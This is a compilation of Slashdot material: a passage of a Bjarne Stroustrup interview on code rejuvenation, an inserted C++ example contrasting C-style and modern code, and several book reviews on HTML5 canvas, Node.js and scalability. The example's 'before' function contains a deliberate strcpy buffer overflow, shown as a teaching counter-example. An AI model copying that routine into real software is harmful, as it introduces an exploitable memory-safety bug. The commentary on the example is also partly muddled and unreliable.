Apart from work, do you have any personal programming projects going on? Which type of programming do you like most and is there a particular project that you would like to implement?
Bjarne: I tend to look at three kinds of code: code that creates trouble in the context of the C++ standard (subtle cases and proposals), small experiments with programming techniques, and production code. This implies looking at a lot of libraries and writing lots of small examples. Unfortunately, my “day job” plus my standards work do not leave time for significant personal projects.
Code rejuvenation
by SansEverything
You speak a lot about code rejuvenation and bringing old code to new standards. As you are working on C++14, many compilers do not fully support C++11 yet. In the past, it was even worse. Don't you think that this lack of feature support from compilers is a major problem and the biggest obstacle to code rejuvenation?
Bjarne: No. C++11 and/or C++14 implementation availability is not a major problem. Both are getting remedied fast, faster than I would have believed a couple of years ago. The adoption of C++11 is far faster than the C++98 adoption was. Waiting a year or two is not a significant problem in this context. There is plenty of work that can be done today.
When I talk about “rejuvenation” (some people call it “modernization” or “upgrading”), I mean rewriting large amounts of code written in styles known to complicate comprehension, hide bugs, and hinder optimization. I’m thinking of C-style code, code overusing class hierarchies, and some examples of complex template metaprogramming. Such code also tends to prevent newer, better, and simpler techniques from being used in newer code. The reason is partly that the need to interoperate with such code messes up new code, partly that programmers steeped in the old style are reluctant to believe that the newer techniques work.
For example, I’d like to replace uses of arrays and pointers with std::arrays and vectors. I’d like to eliminate macros. I’d like to replace old-style for loops with range-for loops. I’d like to eliminate overuse of free store (heap). I’d like to break up large functions into smaller and more precisely defined ones. I’d like to replace ad hoc code with algorithms. I’d like to replace hand-crafted containers with standard-library ones. If I can, I’d like to eliminate race conditions and increase the amount of concurrency. I want to do all that without adding run-time overheads.
Typically, we cannot afford to rewrite the old code by hand. So when I talk about rejuvenation, I focus on (static) code analysis and code transformation: we must automate the rejuvenation process as far as possible. The reason I don’t refer to this as “refactoring” is that I’m typically not interested in a process that produces 100% compatible code. Some of the transformations I want require human attention. I want major improvement, not bug compatibility. People are working to produce such tools. -
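As an added example (not code from the interview or from Stroustrup), here is a C-style routine beside its rejuvenated C++11 form. It illustrates both the type-safety point made in the "C++ without the C" answer (bugs hiding in low-level code: an unchecked copy into a fixed buffer, a malloc that is easy to leak) and the rejuvenation transformations listed above (no macros, std::vector and std::array instead of arrays and pointers, range-for and standard algorithms instead of hand-written loops, no free store). The token-splitting task, the function names and the reserved-word table are assumptions made for the illustration.

```cpp
// Added example (not from the interview): C-style code and its rejuvenated form.
#include <algorithm>
#include <array>
#include <cstddef>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <string>
#include <vector>

// ---- Before (C-style). MAX_TOKEN_LEN bounds each slot, but strcpy does not
// know that: a word of 16 or more characters overflows its slot silently.
#define MAX_TOKENS 8
#define MAX_TOKEN_LEN 16

int old_split(const char* line, char tokens[][MAX_TOKEN_LEN])
{
    char* copy = (char*)malloc(strlen(line) + 1);   // free store for a temporary
    if (copy == NULL) return 0;
    strcpy(copy, line);
    int n = 0;
    for (char* tok = strtok(copy, " "); tok != NULL && n < MAX_TOKENS; tok = strtok(NULL, " ")) {
        strcpy(tokens[n], tok);   // unchecked: the hidden buffer overflow
        ++n;
    }
    free(copy);                   // any early return above this line leaks 'copy'
    return n;
}

// ---- After (rejuvenated). Containers own their memory, the bound is a typed
// constant, and the result is returned by value (moved, not copied).
constexpr std::size_t max_tokens = 8;

std::vector<std::string> split(const std::string& line)
{
    std::vector<std::string> res;
    std::string cur;
    for (char ch : line) {                         // range-for instead of strtok
        if (ch == ' ') {
            if (!cur.empty() && res.size() < max_tokens) res.push_back(cur);
            cur.clear();
        } else {
            cur += ch;                             // std::string grows; no fixed slot
        }
    }
    if (!cur.empty() && res.size() < max_tokens) res.push_back(cur);
    return res;
}

// A fixed table as std::array replaces a C array walked with pointer arithmetic.
const std::array<std::string, 3> reserved = {{"end", "quit", "exit"}};

// Ad hoc "scan for a reserved word" loops become standard algorithms.
bool contains_reserved(const std::vector<std::string>& tokens)
{
    return std::any_of(tokens.begin(), tokens.end(), [](const std::string& t) {
        return std::find(reserved.begin(), reserved.end(), t) != reserved.end();
    });
}

std::size_t count_longer_than(const std::vector<std::string>& tokens, std::size_t len)
{
    return std::count_if(tokens.begin(), tokens.end(),
                         [len](const std::string& t) { return t.size() > len; });
}

int main()
{
    for (const std::string& t : split("read until end"))
        std::cout << t << '\n';
    std::cout << "reserved word present: " << contains_reserved(split("read until end")) << '\n';
    return 0;
}
```

The rejuvenated version does the same work with no run-time overhead over the C version (the vector and strings are moved out, not copied), which is the point of rewriting rather than merely wrapping the old code. Note that the two halves are not 100% compatible: the old routine silently truncates nothing and overflows instead, while the new one simply keeps whatever fits, which is the kind of behaviour change that needs human attention during a rejuvenation pass.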
Book Review: Core HTML5 Canvas
eldavojohn writes "Core HTML5 Canvas is a book that focuses on illuminating HTML5 game development for beginning and intermediate developers. While HTML and JavaScript have long been a decent platform for displaying text and images, Geary provides a great programming learning experience that facilitates the canvas element in HTML5. In addition, smatterings of physics engines, performance analysis and mobile platform development give the reader nods to deeper topics in game development." Read below for the rest of eldavojohn's review.
Core HTML5 Canvas
author: David Geary
pages: 723
publisher: Prentice Hall
rating: 9/10
reviewer: eldavojohn
ISBN: 9780132761611
summary: An introduction to game development in HTML5's canvas that brings the developer all the way up to graphics, animation and basic game development.
This book is written with a small introduction to HTML and JavaScript. While Geary does a decent job of describing some of those foundational skill sets, I fear that a completely novice developer might have a hard time getting to the level required for this text. With that in mind, I would recommend this book for people who already have at least a little bit of HTML and JavaScript development in their background. This book may also be useful to veteran developers of an unrelated language who can spot software patterns easily and aren't afraid to pick up JavaScript along the way. You can read all of Chapter One of the book here if you want to get a feeling for the writing. Geary also has sample chapters available on his site for the book, corehtml5canvas.com and maintains the code examples on Github. If you already write games, this book is likely too remedial for you (especially the explanations of sprites and collision detection) and the most useful parts would be Geary's explanation of how to produce traditional game elements with the modern HTML5 standards.
I have very few negative things to say about this text – many of which may be attributed to personal preferences. This book is code heavy. It starts off with a sweet spot ratio for me. I found I spent about twenty to thirty percent of my time scanning over HTML and JavaScript snippets inserted occasionally into passages. However, by the last chapters, I found myself poring over lengthier and lengthier listings that made me feel like I was spending sixty to seventy percent of my time analyzing the JavaScript code. To be fair, the author does do a good job of simply referencing back to concepts learned in other chapters but I wouldn't mind a re-explanation of those topics or a more in-depth analysis of how those concepts interoperate. I also feel that it is risky to put so much code into print as that greatly impacts the shelf life of an unchanging book. The book itself warns on page 51 that toBlob() was a new specification added to HTML5 between writing the book and the book being published. I feel like this would warrant much more English explaining what you're accomplishing and why so that the book does not age as much from being tightly coupled to a snapshot of the specifications.
The code listings in this book are wonderfully colored to indicate quickly to the eye what part of the JavaScript language each piece is. I'm not sure how many copies suffer from this but my book happened to have a problem on some of the pages whereby the comprising colors did not line up. Here is a good example and a bad example just a few pages apart.
This was infrequent but quite distracting as the code became more and more predominant. Lastly, Geary briefly introduces the reader to amazing performance tools (jsPerf in Chapter 1 and again Browserscope in Chapter 4) early on and demonstrates how to effectively exercise it on small pieces of JavaScript. In the particular example he shows how subtle differences in handling image data can affect the performance inside different browsers (even different versions of the same browser as I'm sure the JavaScript engines are repeatedly tweaked). Since games are always resource intensive, I wondered why the author didn't take these examples to the next level and show the reader how to write unit tests (not really covered in the book). That way each of these functions could be extracted to a common interface where it would be selectively chosen based on browser identification. While this might be unnecessary for images, it would be a nod toward addressing the long pole in the tent when you look to squeeze cycles out of your code. Oddly, as more concepts are established and combined, these performance exercises disappear. I understand this book was an introduction to these side quests with a focus on game development but this was one logical step I wish had been taken further (especially in Chapter 9: The Ungame).
About a year ago, I started a hobby project to develop a framework for playing cards in the browser on all platforms. The canvas element would be the obvious tool of choice for accomplishing this goal. Unfortunately I began development using a very HTML4 attitude with (what I now recognize) was laughable resource management. This book really helped me further along in getting that hobby project to a more useable state.
The first chapter of the book introduces the reader to the basics of HTML5 and the canvas element. The author covers things like using clientX and clientY for mouse events instead of x and y. A simple clock is built and shows how to correctly use the basic drawing parts of the HTML5 specification. For readers unfamiliar with graphics applications, a lot of ground is covered on how you programmatically start by constructing an invisible path that will not be visually rendered until stroke() or fill() is called. The chapter also covers the basic event/listener paradigm employed by almost anything accepting user input. Geary explains how to properly save and restore the surface instead of trying to graphically undo what was just done.
An important theme through this book is how to use HTML elements alongside a canvas. This was one of the first follies of my "everything goes in canvas" attitude. If you want a control box in your application, don't reinvent the partially transparent box with paths and fills followed by mouse event handling over your canvas (actually covered in Chapter 10) – simply use an HTML div and CSS to position it over your canvas. Geary shows how to do this and would have saved me a lot of time. Geary discusses and shows how to manage off-screen canvases (invisible canvases) in the browser which comes in mighty handy when boosting performance in HTML5. The final parts of Chapter One focus on remedial math and how to correctly handle units of measure when working in the browser.
Chapter Two shows the reader how to build a rudimentary paint application with basic capabilities. It does a great job of showing how to expand on the basic functions provided by HTML5 and covers a little bit of the logic behind the behavior. Geary goes so far as to show the reader how to extend some of the core components of HTML5 like CanvasRenderingContext2D with an additional function. He also cautions that this can lead to pitfalls in JavaScript. This chapter does an excellent job of exploiting and enumerating core drawing functionality to achieve the next level in using these lines and objects for a desired user effect. Prior to reading this chapter, I hadn't viewed clip() in the correct light and Geary demonstrates the beginnings of its importance in building graphics. In Chapter Three, text gets the same extensive treatment that the basic drawing elements did in Chapter Two. In reading this chapter, it became apparent that HTML5 has a lot of tips and tricks (perhaps that comes with the territory of what it's trying to achieve) like you have to replace the entire canvas to erase text. Being a novice, I'm not sure if the author covered all of such things but I was certainly appreciative for those included.
Chapter Four was an eye opener on images, video and their manipulation in canvas. The first revelation was that drawImage() can also render another canvas or even a video frame into the current canvas. The API name was not indicative to me but after reading this chapter, it became apparent that if I sat down and created a layout of my game's surface, I could render groups of images into one off-screen canvas and then continually insert that canvas into view with drawImage(). This saved me from considerable rerendering calls. The author also included some drag and drop sugar in this chapter. The book helped me understand that sometimes there are both legacy calls to old ways of doing things and also multiple new ways to accomplish the same goal. When you're trying to develop something as heavy as a game, there are a lot of pitfalls.
Chapter Five concentrates on animations in HTML5 and first and foremost identifies a problem I had struggled with in writing a game: don't use setInterval() or setTimeout() for animations. These are imprecise and instead the book guides the reader with instructions on letting the browser select the frame rate. Being a novice, the underlying concepts of requestAnimationFrame() had eluded me prior to reading this book. Geary's treatment of discussing each browser's nuances with this method may someday be dated text but helped me understand why the API call is so vital. It also helps you build workarounds for each browser if you need them. Blitting was also a new concept to me as was the tactic of double buffering (which the browser already does to canvas). This chapter is heavy on the hidden caveats to animation in the browser and builds on these to implement parallax and a stopwatch. The end of this chapter has a number of particularly useful "best practices" that I now see as crucial in HTML5 game development.
Chapter Six details sprites and sprite sheets. Here the author gives us a brief introduction to design patterns (notably Strategy, Command and Flyweight) but it's curious that this isn't persisted throughout the text. This chapter covers painters in good detail and again how to implement motion and timed animation via sprites with requestNextAnimationFrame(). This chapter does a great job of showing how to quickly animate a spritesheet.
Chapter Seven gives the user a brief introduction to implementing simple physics in a game engine like gravity and friction. It's actually just enough to move forward with the upcoming games but the most useful section of this chapter to me was how to warp time. While this motion looks intuitive, it was refreshing to see the math behind ease-in or ease-out effects. These simple touches look beautiful in canvas applications and critical, of course, in modeling realistic motion.
Naturally the next thing needed for a game is collision detection and Chapter Eight scratches the surface just enough to build our simple games. A lot of fundamental concepts are discussed like collision detection before or after the collision happens. Geary does a nice job of biting off just enough to chew from the strategies of ray casting, the separating axis theorem (SAT) and minimum translation vector algorithms for detecting collisions. Being a novice to collision detection, SAT was a new concept to me and I enjoyed Geary's illustrations of the lines perpendicular to the normal vectors on polygons. This chapter did a great job of visualizing what the code was achieving. The last thing this chapter tackles is how to react or bounce off during a collision. It provided enough for the games but it seemed like an afterthought to collision detection. Isn't there a possibility of spin on the object that could influence a bounce? These sort of questions didn't appear in the text.
And Chapter Nine gets to the main focus of this book: writing the actual game with all our prior accumulated knowledge. Geary calls this light game engine "the ungame" and adds things like multitrack sound, keyboard event handling and how to implement a heads-up display to our repertoire. This chapter is very code heavy and it confuses me why Geary prints comments inlined in the code when he has a full book format to publish his words in. The ungame was called as such because it put together a lot of elements of the game but it was still sort of missing the basic play elements. Geary then starts in on implementing a pinball game. It may sound overly complicated for a learning text but as each piece of the puzzle is broken down, the author manages to describe and explain it fairly concisely. While this section could use more description, it is basically just bringing together and applying our prior concepts like emulating physics and implementing realistic motion. The pinball board is merely polygons and our code there to detect collisions with the circle that is the ball. It was surprising how quickly a pinball game came together.
Chapter Ten takes a look at making custom controls (as mentioned earlier about trying to use HTML when possible). From progress bars to image panners, this chapter was interesting and I really enjoyed the way the author showed how to componentize and reuse these controls and their parts. There's really not a lot to say about this chapter, as you may imagine a lot of already covered components are implemented in achieving these controls and effects.
Geary recognizes HTML5's alluring potential of being a common platform for developing applications and games across desktops and mobile devices. In the final chapter of the book, he covers briefly the ins and outs of developing for mobile — hopefully without having to force your users to a completely different experience. I did not realize that native looking apps could be achieved on mobile devices with HTML5 but even with that trick up its sleeve, it's hard to imagine it becoming the de facto standard for all applications. Geary appears to be hopeful and does a good job of getting the developer thinking about the viewport and how the components of their canvas are going to be viewed from each device. Most importantly, it's discussed how to handle different kinds of input or even display a touch keyboard above your game for alphabetic input.
This was a delightful book that will help readers understand the finer points of developing games in HTML5's canvas element. While it doesn't get you to the point of developing three dimensional blockbuster games inside the browser, it does bite off a very manageable chunk for most readers. And, if you're a developer looking to get into HTML5 game design, I heavily recommend this text as an introduction.
You can purchase Core HTML5 Canvas from amazon.com. Slashdot welcomes readers' book reviews (sci-fi included) -- to see your own review here, read the book review guidelines, then visit the submission page. -
Book Review: Sams Teach Yourself Node.js In 24 Hours
Michael Ross writes "Since its introduction in 1994, JavaScript has largely been utilized within web browsers, which limited JavaScript programmers to client-side development. Yet with the recent introduction of Node.js, those programmers can leverage their skills and experience for server-side efforts. Node.js is an event-based framework for creating network applications — particularly those for the Web. Anyone interested in learning this relatively new technology can begin with one of numerous resources, including Sams Teach Yourself Node.js in 24 Hours." Keep reading for the rest of Michael's review.
Sams Teach Yourself Node.js in 24 Hours
author: George Ornbo
pages: 464
publisher: Sams Publishing
rating: 7/10
reviewer: Michael J. Ross
ISBN: 978-0672335952
summary: An introduction to the Node.js framework.
This book, authored by George Ornbo, was released by Sams Publishing on 15 September 2012, under the ISBN 978-0672335952. The recent publication date is promising, because Node.js is evolving rapidly, thus gradually obsoleting books written not that long ago. On the publisher's page, visitors will find a brief description of Ornbo's book, a few customer reviews, the table of contents, a sample chapter (the 14th, "A Streaming Twitter Client"), and links to purchase the print and electronic versions of the book. There is also a link to the companion site, which offers some of the same content as Pearson's page, but also has a link to download an archive file containing all the example code, nicely organized.
The book's material spans 464 pages, and is organized (shoehorned) into 24 "hours" (chapters), grouped into six parts. The first two chapters in "Getting Started" explain how the reader can download Node.js, create a "hello world" web server program, install new modules using npm (Node Packaged Modules), search for modules, locate documentation on them, and indicate module dependencies for an application. Unfortunately, the blocks of source code presented in the first examples (Listing 1.1 and Figure 2.2) are not explained in the narrative (until the fifth chapter) or even commented. Readers would likely appreciate some clues as to the nature of http.createServer, req, res, the "underscore" module, etc. — especially at the beginning of their journey. If readers are not expected to understand these details at this point, then they should be told so, to avoid any concerns that such an understanding is assumed in the subsequent chapters. The author does not explain where Node.js is installed or what changes it makes to the terminal's default path variable. On page 18, the term "project folder" is unclear: should the "underscore" module end up in hour02/example01/node_modules, or nodejs/node_modules, or nodejs/node_modules/npm/node_modules? Only later is this (partially) answered.
Chapter 3 demonstrates the complexity that arises from concurrent input/output in networked applications. This material should arguably have been presented at the beginning of the book, to better establish the purpose of Node.js, and the value to the reader of studying it. The next chapter summarizes jQuery and JavaScript callbacks, and then provides a helpful discussion of how Node.js uses the latter. The author contends that the asynchronous paradigm of Node.js is unsuitable for long-running processes, but does not explain why this is true, which would have provided some substantiation for the claim.
The second part of the book, "Basic Websites With Node.js," encompasses four more chapters. The first one discusses how to: create a simple server (using the core HTTP module), examine the response headers (generated for web pages, in different browsers and on the Linux command line), execute 301 redirects, respond to different types of requests (using the URL module), and create a simple client. Oddly, the author does not explain or even mention the sizable JSON output — the first line of which is "{ domain: null," — displayed in the reader's server terminal when the web page pointing to that server is refreshed or when the "curl -I" command is run. The next two chapters cover how to build websites using the Express framework, and are likely the first point where the reader will see some of the real-world complexity of Node.js. The eighth chapter explains how to persist data between calls to the application, including files, environment variables, and MongoDB.
Debugging, testing, and deploying are all critical topics for any application development, and are covered in the third part of the book. The author illustrates three methods of debugging: STDIO, a core module, is a lightweight method for debugging Node.js code; it allows one to output messages to the console, check the value of any variable or literal, and track function calls and responses from third-party services. Node.js provides access to the more powerful debugger of V8 (the Google Chrome JavaScript engine), which supports breakpoints and code stepping. Node Inspector, compatible with WebKit-based browsers, provides all of the above functionality, and more. The next two chapters present several modules that ease the important process of creating full-coverage tests, and demonstrate how to deploy applications to any one of three Node.js-capable cloud hosting providers (Heroku, Cloud Foundry, and Nodester).
Having covered the basics of Node.js, the author begins the fourth part of his book with two chapters that show how to use Socket.IO, WebSockets, and Express to build real-time web applications. These techniques are illustrated in the development of a chat server as well as a nickname management and messaging system. The aforementioned sample chapter extends these techniques further in working with the Twitter API to consume its real-time data, push it to the browser, and show results in a dynamic graph. This section is wrapped up with coverage primarily of JSON — specifically, how to create, consume, and send JSON-structured data.
APIs were addressed briefly in the previous section, but are explored much more deeply in the subsequent five chapters. Readers may initially conclude that the discussion of processes is elementary, but the author then shows how one could utilize that knowledge to interact with Node.js scripts, including detecting script exits and errors, sending signals and arguments to a script, generating child processes if needed, and sending messages among them. In the 18th chapter, the author goes into greater detail about Node.js's Events module, best practices, and how to generate event listeners dynamically. The buffer API may be low-level, but it is essential for storing raw binary data, as opposed to the Unicode-encoded strings that JavaScript uses within a browser. The Buffer and Stream modules are presented with plenty of helpful examples.
The last part of the book addresses miscellaneous topics, starting with CoffeeScript (a JavaScript precompiler). While CoffeeScript affords numerous benefits, it is not clear why it would deserve an entire chapter in a book dedicated to Node.js. In the next chapter, readers learn how to verify their Node.js code, add command-line executables, and then package it all up into portable modules that can be contributed to the npm registry or GitHub. The last two chapters explain how to create and configure middleware using the Connect module, and how to use Backbone.js (a front-end JavaScript framework) in conjunction with Node.js to build browser-based web applications.
Each chapter concludes with a summary (invariably a waste of space), a Q&A section, a workshop comprising quiz questions (with the answers presented immediately below it, for almost instant spoiling), and several exercises for the reader. The index at the end is missing several of the important topics discussed in the text.
The book contains many errata: "EBay" (page 1; should read "eBay"), "OSX" (page 9; presumably Mac OS X), "yaml" (page 15; should read "YAML"), "irc" (19), "led to [a] great deal" (27), "to solve Concurrency" (37), "process" (54; should read "processes"), "try and" (55; should read "try to"), "This goal" (56; should read "The goal"), "how [a] class" (56), "You will [see] the" (62), "status of [a] web server" (70), "javascripts" (77), and "then [the] name" (87). At this point, less than 20 percent into the book, it was clear that the copyeditors had done a sloppy job, so I stopped recording these flaws that should have been caught. Those first four errata suggest that "textese" is even pervading the world of technical publishing. (Strangely, there does not appear to be a place on the publisher's website for reporting errata.)
The production team should have been looking for places to cut down on the heft of the print edition. The "Try It Yourself" sections sometimes duplicate what is found in the regular text nearby — especially in the third and fourth chapters. For instance, three sets of HTML markup are repeated, as well as the surrounding discussion (pages 42 through 47).
In general, the text does not appear to have been carefully scrutinized by technical reviewers and copyeditors. Occasionally the reader is given critical information later than would be optimal, e.g., the "Watch Out" warning on page 18, provided after the reader installs a module. The writing style is noticeably awkward in countless places in the book, including several run-on sentences. (Technical authors should not be bashful in using commas when doing so would help readability.) Also, the text is littered with too many exclamation marks — as if that is going to make any narrative more exciting.
In terms of the production quality of the book, a lay-flat binding would have made it much easier to read when using both hands on the keyboard. Also, in my review copy (kindly provided by the publisher), a disappointingly large number of the pages had small black splotches of ink; fortunately, none made the text unreadable.
On the other hand, Node.js is certainly not a simple subject area, and this book is able to convey a lot of information about it. This book's forte is the extensive use of example code to illustrate the concepts being presented. Incidentally, kudos to the author for inviting the reader to contribute to the Node.js community, such as adding new modules to GitHub or updating the documentation of existing modules. Overall, readers new to Node.js would certainly benefit from working their way through this volume.
Michael J. Ross is a freelance web developer and writer.
You can purchase Sams Teach Yourself Node.js in 24 Hours from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.
Book Review: Sams Teach Yourself HTML5 Mobile Application Development
Michael J. Ross writes "The last few years have seen the emergence of several significant advances in web technologies, including HTML5 and CSS3 — all impacting the development of traditional and mobile-centric web sites. In turn, various technical book publishers have released titles addressing one or more of these technologies. While one book may focus on HTML5 and the new JavaScript APIs, another might include extensive coverage of CSS3, with little mention of JavaScript. A recent title, Sams Teach Yourself HTML5 Mobile Application Development in 24 Hours, focuses on some of the more commonly employed elements introduced with HTML5, and how they can be used for creating mobile sites and applications." Read below for the rest of Michael's review.

Sams Teach Yourself HTML5 Mobile Application Development in 24 Hours
author: Jennifer Kyrnin
pages: 496
publisher: Sams Publishing
rating: 8/10
reviewer: Michael J. Ross
ISBN: 978-0672334405
summary: A tutorial on building web sites and apps with HTML5.

This book was authored by Jennifer Kyrnin, who has plenty of experience in using as well as teaching web design techniques, and who curates the Web Design / HTML section of About.com. The book was put out by Sams Publishing (an imprint of Pearson Education) on 25 November 2011, under the ISBN 978-0672334405. On the publisher's page, visitors will find the book's description and table of contents, and some sample content in a PDF document, including the first chapter, "Improving Mobile Web Application Development with HTML5." The page appears to not list any reported errata. This book is available in both print and electronic formats (EPUB and PDF), but prospective buyers should be warned that the e-book is less than seven dollars cheaper than the print version ($25.59 versus $31.99), despite the huge disparity in production and distribution costs. The author's web site offers additional information, primarily in the form of a newsletter devoted to HTML5.
The preface claims that this second web site has the example source code from the book, as well as ways to ask questions and report errata; but if so, they are well hidden, as of this writing.
Spanning 496 pages in total, the book's material is organized into two dozen chapters, as is usual with any of the books in the "Sams Teach Yourself X in 24 Hours" series. Readers may well wonder if this artificial constraint causes the various authors to structure their books in a way that does not always make sense. In the case of this title, there does appear to be some forced splitting of material between two chapters, namely, "Building a Mobile Web Application" and "Converting Web Apps to Mobile." Conversely, three topics that may deserve their own chapters are lumped together, in "WebSockets, Web Workers, and Files." Moreover, it is arguably unrealistic to expect that the typical reader will be able — or would even attempt — to read and comprehend a technical book of such length and subject matter in only 24 hours — to say nothing of the time required to type in the sample code (in order to test it and reinforce the information learned). This "teach yourself in 24 hours" format borders on "brain surgery in three easy steps." Lastly, it leads to silly phrasing such as: "a result of reading the hour" (page xvii).
The chapters and appendices are grouped into four parts, the first of which is titled "Building Web Pages and Applications with the Open Web Standard." The structure of the first chapter is replicated in all of the other chapters: The author briefly lists what the reader will learn, and then begins explicating the concepts, illustrated with example code wherever appropriate. Each chapter concludes with a summary (which is of no value), several FAQs (whose material should instead be folded into the main chapter content), and a workshop section comprising quiz questions and exercises for the reader to tackle. Part I's eight chapters introduce HTML5, web applications, the W3C Open Web Standard, the new HTML5 elements and their attributes, CSS3 (with justifiably limited coverage), mobile browser detection, JavaScript, and jQuery. Then the author presents the basics of how to build mobile web apps, both from scratch and from using a non-mobile web site as a starting point.
Part II, "Learning the HTML5 Essentials," goes into greater detail of numerous basic aspects of HTML5: the new HTML5 sectioning, heading, and semantic elements; the semantic repurposing of some HTML 4 elements; the new canvas element (with limited coverage of this extensive topic); new typography support; audio and video elements; new form capabilities; HTML editable content, spell checking, and other user interactivity; microformats, microdata, and RDFa; in-page drag and drop; and new functionality for linking (the <a>, <area>, and <link> elements). Readers should note that the discussion in the ninth chapter on the new sectioning elements starts off rather confusingly, but soon improves, making it well worth reading.
The third part of the book, "HTML5 for Mobile and Web Applications," begins with an introduction to web apps, as well as the HTML5 application programming interfaces (APIs) and data sets upon which they may rely. The author then discusses specific APIs that can be of great use in web apps — specifically, the WebSockets, Web Workers, and File APIs, which allow one to make asynchronous connections between the app and a remote host, perform scripted background processing, and access local files. The remaining chapters show how to: make a web app usable even when it is disconnected from the Internet; save data on the client side (using local storage, session storage, Web SQL, and IndexedDB); control the browser history; geolocate the client; and convert an HTML5 application into a native mobile app, with detailed information on using PhoneGap. Aside from the index, the book concludes with three appendices that cover: answers to the end-of-chapter quizzes; a list of the HTML5 elements and their more commonly-employed attributes; and a list of other books and web sites that address HTML5 and mobile design and development.
The average programming book — particularly one of this size, and in a first edition — will contain some errata, and this one is no exception: "shortcut style" should read "shorthand style" (page 37); "Specific[,] Measurable" (87); "complimentary" should read "complementary" (93); the "By the Way" section on page 131 is missing a close parenthesis; "html5elmeents" (136); "will [be] eventually" (184); "a straight line [] they" (184); "makes build[ing] forms" (223); "method[s] exist" (362); "the page [it] is on" (383); and "()creates" (390).
There are some other parts of the text where either the author or the editorial team may have been careless — for instance, the figcaption and figure tags repeated on pages 16 and 18. Fortunately, such cases are few and far between. The HTML, CSS, and JavaScript code is generally of decent quality, except much of the HTML markup is not indented properly. In the JavaScript code, most if not all of the string concatenation is jammed together, making the elements difficult to distinguish (e.g., page 72). Also, some of the HTML does not utilize the more streamlined attributes of HTML5, such as <script type="text/javascript"> (e.g., page 20), or is not well formed, such as </li> tags missing (e.g., pages 236 and 250).
The author occasionally uses terminology that would be comprehensible only to someone who already has the knowledge that the narrative presents for the first time, without providing at least a quick explanation, e.g.: the "!!" JavaScript operator (page 55); the terms "rollover" and "user agent" (page 69 for both); and "the manifest comes up 404 or 410" (page 342). Some of the advice may be true, but is rather outdated, such as the admonitions in the first chapter to not use frames, nor to use tables or spacer images for layout. Those principles were validated and disseminated many years ago. Some statements could easily be misinterpreted by beginners, e.g., "As long as your HTML file is in the same folder as your style sheet file, it will load your styles when your page is loaded" (page 36). Other statements are not explained in detail or substantiated, and consequently the reader will probably not understand the reasoning behind them, e.g., "using the min- and max- extensions is more effective" (page 61), and "a separate mobile domain [] makes your mobile site easier to find" (page 10). Readers may disagree completely with some of the claims, e.g., "XHTML [is] very difficult to write" (page 2).
There are only two discernible problems with the production of the book: In some of the HTML code, curly quotes are used (e.g., page 303). Secondly and more importantly, the sans-serif font used to indicate keywords looks much too similar to the serif font of the regular text, causing the keywords to blend into the surrounding material.
Yet the main problem with the narrative is the somewhat erratic manner in which the author skips from one topic to the next, often providing just a few paragraphs or even sentences for each topic — giving the impression that critical information may have been neglected as a result of the less-than-methodical organization of the material. Most of those topics are discussed again, in varying levels of detail, in later chapters. This is not optimal, because technical readers generally hope to find full coverage of any given topic in one place; hence, it can be frustrating if the information is scattered throughout a book. This is especially true if the reader has already read the book in full, and is now returning to it in order to utilize it as a reference source. For instance, in many cases, attributes are presented, but without detailed explanation or examples. Fortunately, the worst of it seems to be confined to Part I of the book, which contains most of the introductory material. Most if not all of the key concepts appear to be addressed to at least some extent. Lastly, some of the information that should have been presented right up front, is not, e.g., the definitions of HTML5 on pages xiv, 1, and 52.
Unlike most programming books nowadays, this one has few instances of phrasing that would baffle the reader for long, and there are no goofy attempts at humor. For most of the topics, the information provided is the minimum to achieve the bulk of the desired results. The advantage to this is that the narrative is generally concise and quick to read, and the author is able to cover a lot of ground without having to package such a broad topic in a (more expensive) tome. Some of the narrative is quite good, such as the explanations of the various browser exceptions involved in the HTML5 drag-and-drop functionality.
Despite the aforementioned blemishes, this book is definitely worth a look, because it is currently one of the most complete tutorials for learning how to use HTML5 for creating mobile apps and web sites.
Michael J. Ross is a freelance web developer and writer.
You can purchase Sams Teach Yourself HTML5 Mobile Application Development in 24 Hours from amazon.com.
Book Review: Scalability Rules
eldavojohn writes "As a web developer in the 'Agile' era, I find myself making (or recognizing) more and more important decisions being made in developing for the web. Scalability Rules cemented and codified a lot of things I had suspected or picked up from blogs but failed to give much more thought to and had difficulty defending as a member of a team. A simple example is that I knew state is bad if unneeded but I couldn't quite define why. Scalability Rules provided this confidence as each of the fifty rules is broken down in a chapter that is divided into what, when, how, why and key takeaways. A strength of the book is that these rules cover all aspects of web development; but that became a double-edged sword as I struggled through some rules meant for managers or technical operators." Read below for the rest of eldavojohn's review.

Scalability Rules: 50 Principles for Scaling Web Sites
author: Martin L. Abbott and Michael T. Fisher
pages: 272
publisher: Addison-Wesley Professional
rating: 8/10
reviewer: eldavojohn
ISBN: 978-0321753885
summary: 50 Principles for Scaling Web Sites

You might recognize the authors as two of the three partners of AKF Partners which means that the book pushes a lot of their concepts like the AKF Cube. A bonus is that they have a very long list of clients and aren't afraid to remind the reader that they have consulted to hundreds of companies so when they say they see these rules solving problems frequently, there's weight to that. Also, they have two books but don't confuse Scalability Rules with The Art of Scalability as the latter focuses on people, processes and technology instead of the rules of scaling.
First off, this book gives you a primer of rules for you to start with depending on whether you are mostly a manager, software developer or technical operations personnel. I'll concentrate on the specifics of the software developer chapter and summarize the others at the end of this review. Also note that aside from some SQL, I only saw PHP code in this book. Luckily there's only a handful of snippets presented and they are easy to follow. Additionally, each chapter ends with solid references (usually online resources) to back up the claims listed in those sets of rules.
The first chapter is devoted to reducing the equation and focuses on removing needless complexity from your solution. You can find this chapter here if you want to see how the layout looks. They give a lot of solid reasons for this and also a lot of good examples like understanding what your users care about. Why build a prompt to export a blog post as a PDF if 99% of the users don't care about it? Next up they say the rule to design to scale means designing for 20x capacity, implementing for 3x capacity and deploying to 1.5x capacity. A strength of the book is the grids that illustrate what is low, medium or high cost and impact through the chapters. Every time they discuss options at different parts of the solution development process, the user is given a chart to understand why. The next rule stresses that you can usually identify 80% of your benefit achieved from 20% of the work (80-20 rule). Rule 4 is strangely specific and implores the reader to simply reduce DNS lookups. However — and this is the first of many — they remind the reader that this rule must be balanced with putting your system all on one server just to reduce DNS lookups. Such a strategy can result in that becoming a choke point. Rule 5 quite simply instructs the reader to use as few objects as possible in your webpage.
